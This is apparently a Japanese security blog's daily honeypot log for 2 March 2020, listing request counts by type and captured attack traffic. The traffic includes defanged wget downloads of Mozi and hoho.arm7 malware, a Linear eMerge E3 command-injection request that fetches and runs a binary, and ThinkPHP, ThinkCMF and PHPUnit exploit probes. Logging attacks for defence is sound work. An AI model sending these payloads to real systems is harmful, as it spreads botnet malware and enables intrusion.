23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(350日目)

2020/03/02(月)

トータルは573件でした。

ハンティングログは以下です。

88.34.126[.]169 wget hxxp[:]//switchnets[.]net/hoho.arm7
88.34.126[.]169 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

125.127.52[.]176 wget+http://192.168.1[.]1:8088/Mozi.m

www.virustotal.com

110.153.65[.]173 wget+hxxp[:]//172.36.55[.]151:51059/Mozi.m

www.virustotal.com

件数 概要 リクエス
467 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
55 アクセス GET /
16 調査 GET /is_test
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 Gponルータの脆弱性を狙った通信 POST /GponForm/diag_Form?images/
2 Tomcatの調査 GET /manager/text/list
2 不明 GET /hudson
2 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
2 不明 GET //admin/config.php?password%5B0%5D=ZIZO&username=admin
1 PHPUnit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Huawei HG532の脆弱性を狙った通信 POST /ctrlt/DeviceUpgrade_1
1 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 Red Lion製品の調査 GET /portal/redlion
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 Gitの調査 GET /.git/config
1 不正中継の試み CONNECT ip.ws.126.net:443